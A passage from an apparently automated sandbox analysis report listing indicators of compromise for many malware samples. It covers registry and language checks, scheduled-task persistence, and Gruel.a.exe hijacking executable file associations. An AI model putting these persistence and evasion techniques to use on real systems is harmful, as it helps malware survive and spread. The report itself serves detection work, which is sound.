description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cheat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ink.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ButterflyOnDesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Amus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lokibot.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winlog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
Checks processor information in registry 2 TTPs 28 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 3556 timeout.exe 1712 timeout.exe 2180 timeout.exe 1456 timeout.exe 6060 timeout.exe 5012 timeout.exe 5976 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2836 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 352 taskkill.exe 5980 taskkill.exe 5776 taskkill.exe 5800 taskkill.exe 188 taskkill.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title = "kIlLeRgUaTe 1.03, I mAke ThIs vIrUs BeCaUsE I dOn'T hAvE NoThInG tO dO!!" Gruel.a.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133878392268526585" msedge.exe -
Modifies registry class 35 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3174447216-2582055397-1659630574-1000\{E7882D71-48B6-4352-B7AD-08A041DC8B3B} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellEx\PropertySheetHandlers Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\InProcServer32\ = "Shell32.dll" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\InProcServer32\ThreadingModel = "Apartment" Gruel.a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellFolder\Attributes = 00000000 Gruel.a.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellEx Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellFolder Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon\ = "C:\\Users\\Admin\\Downloads\\Gruel.a.exe,0" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\InProcServer32 Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon\ = "C:\\Users\\Admin\\Downloads\\Gruel.a.exe,0" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htafile\Shell\Open\Command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\DefaultIcon Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open Gruel.a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ShellEx\PropertySheetHandlers\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB} Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\InfoTip = "kIlLeRgUaTe 1.03" Gruel.a.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings wini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\ = "kIlLeRgUaTe 1.03" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB}\Shell\Open\Command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000_Classes\Local Settings R8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8C6D8BD6-116B-4D4E-B1C2-87098DB509BB} Gruel.a.exe -
NTFS ADS 18 IoCs
description ioc Process File created C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Amus.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\VanToM-Rat(1).bat:Zone.Identifier firefox.exe File created C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe\:Zone.Identifier:$DATA VanToM-Rat(1).bat File created C:\Users\Admin\Downloads\Azorult(1).exe:Zone.Identifier firefox.exe File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe File created C:\Users\Admin\Downloads\Apex.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Gruel.a.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\VanToM-Rat.bat:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\28247211d1eb08370aa363f08821a653.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Duksten.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\02ca4397da55b3175aaa1ad2c99981e792f66151.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Happy99.exe:Zone.Identifier firefox.exe -
Runs .reg file with regedit 2 IoCs
pid Process 5972 regedit.exe 3724 regedit.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4316 schtasks.exe 2484 schtasks.exe 5808 schtasks.exe 1364 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5376 Azorult(1).exe 5376 Azorult(1).exe 5376 Azorult(1).exe 5376 Azorult(1).exe 5376 Azorult(1).exe 5376 Azorult(1).exe 5376 Azorult(1).exe 5376 Azorult(1).exe 5376 Azorult(1).exe 5376 Azorult(1).exe 5944 Lokibot.exe 5944 Lokibot.exe 2520 rutserv.exe 2520 rutserv.exe 2520 rutserv.exe 2520 rutserv.exe 2520 rutserv.exe 2520 rutserv.exe 3128 rutserv.exe 3128 rutserv.exe 5732 rutserv.exe 5732 rutserv.exe 2612 rutserv.exe 2612 rutserv.exe 2612 rutserv.exe 2612 rutserv.exe 2612 rutserv.exe 2612 rutserv.exe 4052 rfusclient.exe 4052 rfusclient.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe 2980 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 936 taskhostw.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 684 Process not Found 684 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 5248 msedge.exe 5248 msedge.exe 5248 msedge.exe 5248 msedge.exe 5248 msedge.exe 5248 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 2180 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 4456 firefox.exe Token: SeDebugPrivilege 4456 firefox.exe Token: SeDebugPrivilege 4456 firefox.exe Token: SeDebugPrivilege 5960 CrimsonRAT.exe Token: SeDebugPrivilege 5960 CrimsonRAT.exe Token: SeDebugPrivilege 5960 CrimsonRAT.exe Token: SeDebugPrivilege 5960 CrimsonRAT.exe Token: SeDebugPrivilege 5960 CrimsonRAT.exe Token: SeDebugPrivilege 5960 CrimsonRAT.exe Token: SeDebugPrivilege 5960 CrimsonRAT.exe Token: SeDebugPrivilege 5960 CrimsonRAT.exe Token: SeDebugPrivilege 4456 firefox.exe Token: SeDebugPrivilege 4456 firefox.exe Token: SeDebugPrivilege 4456 firefox.exe Token: SeDebugPrivilege 5944 Lokibot.exe Token: SeDebugPrivilege 2520 rutserv.exe Token: SeDebugPrivilege 5732 rutserv.exe Token: SeTakeOwnershipPrivilege 2612 rutserv.exe Token: SeTcbPrivilege 2612 rutserv.exe Token: SeTcbPrivilege 2612 rutserv.exe Token: SeDebugPrivilege 188 taskkill.exe Token: SeDebugPrivilege 352 taskkill.exe Token: SeDebugPrivilege 5980 taskkill.exe Token: SeDebugPrivilege 5952 powershell.exe Token: SeAuditPrivilege 4104 svchost.exe Token: SeDebugPrivilege 1512 RDPWInst.exe Token: SeDebugPrivilege 5776 taskkill.exe Token: SeDebugPrivilege 5800 taskkill.exe Token: SeDebugPrivilege 5212 Lokibot.exe Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 4320 butterflyondesktop.tmp Token: SeDebugPrivilege 5248 msedge.exe Token: SeDebugPrivilege 5248 msedge.exe Token: SeDebugPrivilege 5248 msedge.exe Token: SeDebugPrivilege 5248 msedge.exe Token: SeDebugPrivilege 4456 firefox.exe Token: SeDebugPrivilege 4456 firefox.exe Token: 33 6496 